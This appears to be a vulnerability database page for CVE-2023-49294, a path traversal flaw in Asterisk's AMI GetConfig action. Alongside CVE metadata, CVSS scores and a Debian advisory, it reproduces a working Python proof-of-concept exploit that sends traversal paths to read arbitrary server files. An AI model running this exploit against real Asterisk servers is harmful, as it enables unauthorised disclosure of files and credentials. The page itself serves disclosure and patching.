CVE-2023-49294

Vulnerability from cvelistv5

Published

2023-12-14 19:40

Modified

2024-08-02 21:53

Severity ?

4.9 (Medium) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757	Product
security-advisories@github.com	https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5	Patch
security-advisories@github.com	https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f	Vendor Advisory
security-advisories@github.com	https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html
af854a3a-2127-422b-91ae-364da2661108	https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757	Product
af854a3a-2127-422b-91ae-364da2661108	https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html

Impacted products

Vendor

Product

Version

▼

asterisk

Version: < 18.20.1
Version: >= 19.0.0, < 20.5.1
Version: = 21.0.0
Version: < 18.9-cert6

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T21:53:45.375Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f",
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
          },
          {
            "name": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
          },
          {
            "name": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "asterisk",
          "vendor": "asterisk",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 18.20.1"
            },
            {
              "status": "affected",
              "version": "\u003e= 19.0.0, \u003c 20.5.1"
            },
            {
              "status": "affected",
              "version": "= 21.0.0"
            },
            {
              "status": "affected",
              "version": "\u003c 18.9-cert6"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 4.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-12-14T19:40:46.157Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
        },
        {
          "name": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
        },
        {
          "name": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
        }
      ],
      "source": {
        "advisory": "GHSA-8857-hfmw-vg8f",
        "discovery": "UNKNOWN"
      },
      "title": "Asterisk Path Traversal vulnerability"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2023-49294",
    "datePublished": "2023-12-14T19:40:46.157Z",
    "dateReserved": "2023-11-24T16:45:24.314Z",
    "dateUpdated": "2024-08-02T21:53:45.375Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2023-49294\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2023-12-14T20:15:52.730\",\"lastModified\":\"2024-11-21T08:33:12.447\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue.\"},{\"lang\":\"es\",\"value\":\"Asterisk es un conjunto de herramientas de telefon\u00eda y centralita privada de c\u00f3digo abierto. En Asterisk anterior a las versiones 18.20.1, 20.5.1 y 21.0.1, as\u00ed como en Certified-Asterisco anterior a 18.9-cert6, es posible leer cualquier archivo arbitrario incluso cuando `live_dangerfully` no est\u00e1 habilitado. Esto permite leer archivos arbitrarios. Las versiones de Asterisk 18.20.1, 20.5.1 y 21.0.1, as\u00ed como el asterisco certificado anterior a 18.9-cert6, contienen una soluci\u00f3n para este problema.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":4.9,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":1.2,\"impactScore\":3.6},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"18.20.1\",\"matchCriteriaId\":\"A49E9157-3440-47C5-B730-B1F3BE7240C9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"19.0.0\",\"versionEndExcluding\":\"20.5.1\",\"matchCriteriaId\":\"FCA06EB6-E31A-43B2-A750-186255114B8F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:digium:asterisk:21.0.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"D3E690E3-3E92-42ED-87DD-1C6B838A3FF9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2AFE2011-05AA-45A6-A561-65C6C664DA7B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1:*:*:*:*:*:*\",\"matchCriteriaId\":\"C1117AA4-CE6B-479B-9995-A9F71C430663\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc1:*:*:*:*:*:*\",\"matchCriteriaId\":\"775041BD-5C86-42B6-8B34-E1D5171B3D87\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc2:*:*:*:*:*:*\",\"matchCriteriaId\":\"55EC2877-2FF5-4777-B118-E764A94BCE56\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc3:*:*:*:*:*:*\",\"matchCriteriaId\":\"EB0392C9-A5E9-4D71-8B8D-63FB96E055A5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc4:*:*:*:*:*:*\",\"matchCriteriaId\":\"09AF962D-D4BB-40BA-B435-A59E4402931C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert2:*:*:*:*:*:*\",\"matchCriteriaId\":\"559D1063-7F37-44F8-B5C6-94758B675FDF\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert3:*:*:*:*:*:*\",\"matchCriteriaId\":\"185B2B4B-B246-4379-906B-9BDA7CDD4400\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc1:*:*:*:*:*:*\",\"matchCriteriaId\":\"73D3592D-3CE5-4462-9FE8-4BCB54E74B5B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc2:*:*:*:*:*:*\",\"matchCriteriaId\":\"B3CCE9E0-5DC4-43A2-96DB-9ABEA60EC157\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:-:*:*:*:*:*:*\",\"matchCriteriaId\":\"1EAD713A-CBA2-40C3-9DE3-5366827F18C7\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert1:*:*:*:*:*:*\",\"matchCriteriaId\":\"A5F5A8B7-29C9-403C-9561-7B3E96F9FCA8\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert10:*:*:*:*:*:*\",\"matchCriteriaId\":\"F9B96A53-2263-463C-9CCA-0F29865FE500\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert11:*:*:*:*:*:*\",\"matchCriteriaId\":\"A53049F1-8551-453E-834A-68826A7AA959\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert12:*:*:*:*:*:*\",\"matchCriteriaId\":\"B224A4E9-4B6B-4187-B0D6-E4BAE2637960\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert2:*:*:*:*:*:*\",\"matchCriteriaId\":\"9501DBFF-516D-4F26-BBF6-1B453EE2A630\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert3:*:*:*:*:*:*\",\"matchCriteriaId\":\"9D3E9AC0-C0B4-4E87-8D48-2B688D28B678\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert4:*:*:*:*:*:*\",\"matchCriteriaId\":\"1A8628F6-F8D1-4C0C-BD89-8E2EEF19A5F9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert5:*:*:*:*:*:*\",\"matchCriteriaId\":\"E27A6FD1-9321-4C9E-B32B-D6330CD3DC92\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert6:*:*:*:*:*:*\",\"matchCriteriaId\":\"B6BF5EDB-9D17-453D-A22E-FDDC4DCDD85B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert7:*:*:*:*:*:*\",\"matchCriteriaId\":\"4C75A21E-5D05-434B-93DE-8DAC4DD3E587\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert8:*:*:*:*:*:*\",\"matchCriteriaId\":\"1D725758-C9F5-4DB2-8C45-CC052518D3FD\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert9:*:*:*:*:*:*\",\"matchCriteriaId\":\"B5E2AECC-B681-4EA5-9DE5-2086BB37A5F4\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:18.9:cert1:*:*:*:*:*:*\",\"matchCriteriaId\":\"79EEB5E5-B79E-454B-8DCD-3272BA337A9E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:18.9:cert2:*:*:*:*:*:*\",\"matchCriteriaId\":\"892BAE5D-A64E-4FE0-9A99-8C07F342A042\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:18.9:cert3:*:*:*:*:*:*\",\"matchCriteriaId\":\"1A716A45-7075-4CA6-9EF5-2DD088248A5C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:18.9:cert4:*:*:*:*:*:*\",\"matchCriteriaId\":\"80EFA05B-E22D-49CE-BDD6-5C7123F1C12B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sangoma:certified_asterisk:18.9:cert5:*:*:*:*:*:*\",\"matchCriteriaId\":\"20FD475F-2B46-47C9-B535-1561E29CB7A1\"}]}]}],\"references\":[{\"url\":\"https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}"
  }
}

Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the live_dangerously is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue. Digium of Asterisk Path traversal vulnerabilities exist in products from multiple vendors.Information may be obtained. # Exploit Title: Asterisk AMI - Partial File Content & Path Disclosure (Authenticated)

Date: 2023-03-26

Exploit Author: Sean Pesce

Vendor Homepage: https://asterisk.org/

Software Link: https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/

Version: 18.20.0

Tested on: Debian Linux

CVE: CVE-2023-49294

!/usr/bin/env python3

Proof of concept exploit for CVE-2023-49294, an authenticated vulnerability in Asterisk AMI that

facilitates filesystem enumeration (discovery of existing file paths) and limited disclosure of

file contents. Disclosed files must adhere to the Asterisk configuration format, which is similar

to the common INI configuration format.

References:

https://nvd.nist.gov/vuln/detail/CVE-2023-49294

https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f

https://docs.asterisk.org/Asterisk_18_Documentation/API_Documentation/AMI_Actions/GetConfig/

import argparse import getpass import socket import sys

CVE_ID = 'CVE-2023-49294'

DEFAULT_PORT = 5038 DEFAULT_FILE = '/etc/hosts' DEFAULT_ACTION_ID = 0 DEFAULT_TCP_READ_SZ = 1048576 # 1MB

def ami_msg(action, args, encoding='utf8'): assert type(action) == str, f'Invalid type for AMI Action (expected string): {type(action)}' assert type(args) == dict, f'Invalid type for AMI arguments (expected dict): {type(args)}' if 'ActionID' not in args: args['ActionID'] = 0 line_sep = '\r\n' data = f'Action: {action}{line_sep}' for a in args: data += f'{a}: {args[a]}{line_sep}' data += line_sep return data.encode(encoding)

def tcp_send_rcv(sock, data, read_sz=DEFAULT_TCP_READ_SZ): assert type(data) in (bytes, bytearray, memoryview), f'Invalid data type (expected bytes): {type(data)}' sock.sendall(data) resp = b'' while not resp.endswith(b'\r\n\r\n'): resp += sock.recv(read_sz) return resp

if name == 'main': # Parse command-line arguments argparser = argparse.ArgumentParser() argparser.add_argument('host', type=str, help='The host name or IP address of the Asterisk AMI server') argparser.add_argument('-p', '--port', type=int, help=f'Asterisk AMI TCP port (default: {DEFAULT_PORT})', default=DEFAULT_PORT) argparser.add_argument('-u', '--user', type=str, help=f'Asterisk AMI user', required=True) argparser.add_argument('-P', '--password', type=str, help=f'Asterisk AMI secret', default=None) argparser.add_argument('-f', '--file', type=str, help=f'File to read (default: {DEFAULT_FILE})', default=DEFAULT_FILE) argparser.add_argument('-a', '--action-id', type=int, help=f'Action ID (default: {DEFAULT_ACTION_ID})', default=DEFAULT_ACTION_ID) if '-h' in sys.argv or '--help' in sys.argv: print(f'Proof of concept exploit for {CVE_ID} in Asterisk AMI. More information here: \nhttps://nvd.nist.gov/vuln/detail/{CVE_ID}\n', file=sys.stderr) argparser.print_help() sys.exit(0) args = argparser.parse_args()

# Validate command-line arguments
assert 1 <= args.port <= 65535, f'Invalid port number: {args.port}'
args.host = socket.gethostbyname(args.host)
if args.password is None:
    args.password = getpass.getpass(f'[PROMPT] Enter the AMI password for {args.user}: ')

print(f'[INFO] Proof of concept exploit for {CVE_ID}', file=sys.stderr)
print(f'[INFO] Connecting to Asterisk AMI:  {args.user}@{args.host}:{args.port}', file=sys.stderr)

# Connect to the Asterisk AMI server
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.connect((args.host, args.port))

# Read server banner
banner = sock.recv(DEFAULT_TCP_READ_SZ)
print(f'[INFO] Connected to {banner.decode("utf8").strip()}', file=sys.stderr)

# Authenticate to the Asterisk AMI server
login_msg = ami_msg('Login', {'Username':args.user,'Secret':args.password})
login_resp = tcp_send_rcv(sock, login_msg)
while b'Authentication' not in login_resp:
    login_resp = tcp_send_rcv(sock, b'')
if b'Authentication accepted' not in login_resp:
    print(f'\n[ERROR] Invalid credentials: \n{login_resp.decode("utf8")}', file=sys.stderr)
    sys.exit(1)
#print(f'[INFO] Authenticated: {login_resp.decode("utf8")}', file=sys.stderr)
print(f'[INFO] Login success', file=sys.stderr)

# Obtain file data via path traversal
traversal = '../../../../../../../../'
cfg_msg = ami_msg('GetConfig', {
    'ActionID': args.action_id,
    'Filename': f'{traversal}{args.file}',
    #'Category': 'default',
    #'Filter': 'name_regex=value_regex,',
})
resp = tcp_send_rcv(sock, cfg_msg)
while b'Response' not in resp:
    resp = tcp_send_rcv(sock, b'')

print(f'', file=sys.stderr)
print(f'{resp.decode("utf8")}')

if b'Error' in resp:
    sys.exit(1)

pass  # Done

. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512

Debian Security Advisory DSA-5596-1 security@debian.org https://www.debian.org/security/ Markus Koschany January 04, 2024 https://www.debian.org/security/faq

Package : asterisk CVE ID : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786 Debian Bug : 1059303 1059032 1059033

Multiple security vulnerabilities have been discovered in Asterisk, an Open Source Private Branch Exchange.

CVE-2023-37457

The 'update' functionality of the PJSIP_HEADER dialplan function can exceed
the available buffer space for storing the new value of a header. By doing
so this can overwrite memory or cause a crash. This is not externally
exploitable, unless dialplan is explicitly written to update a header based
on data from an outside source. If the 'update' functionality is not used
the vulnerability does not occur.

CVE-2023-38703

PJSIP is a free and open source multimedia communication library written in
C with high level API in C, C++, Java, C#, and Python languages. SRTP is a
higher level media transport which is stacked upon a lower level media
transport such as UDP and ICE. Currently a higher level transport is not
synchronized with its lower level transport that may introduce a
use-after-free issue. This vulnerability affects applications that have
SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media
transport other than UDP. This vulnerability’s impact may range from
unexpected application termination to control flow hijack/memory
corruption.

CVE-2023-49786

Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP.

For the oldstable distribution (bullseye), these problems have been fixed in version 1:16.28.0~dfsg-0+deb11u4.

We recommend that you upgrade your asterisk packages.

For the detailed security status of asterisk please refer to its security tracker page at: https://security-tracker.debian.org/tracker/asterisk

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7 UeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F Jtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl AZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b zejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk T5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb bhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu mN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh bRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ Qvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+ sxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU +k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A -----END PGP SIGNATURE-----

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202312-2340",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "asterisk",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "digium",
        "version": "20.5.1"
      },
      {
        "model": "certified asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sangoma",
        "version": "16.8.0"
      },
      {
        "model": "certified asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sangoma",
        "version": "18.9"
      },
      {
        "model": "asterisk",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "digium",
        "version": "19.0.0"
      },
      {
        "model": "asterisk",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "digium",
        "version": "18.20.1"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "digium",
        "version": "21.0.0"
      },
      {
        "model": "certified asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sangoma",
        "version": "13.13.0"
      },
      {
        "model": "asterisk",
        "scope": null,
        "trust": 0.8,
        "vendor": "digium",
        "version": null
      },
      {
        "model": "certified asterisk",
        "scope": null,
        "trust": 0.8,
        "vendor": "sangoma",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-49294"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Sean Pesce",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "177819"
      }
    ],
    "trust": 0.1
  },
  "cve": "CVE-2023-49294",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2023-49294",
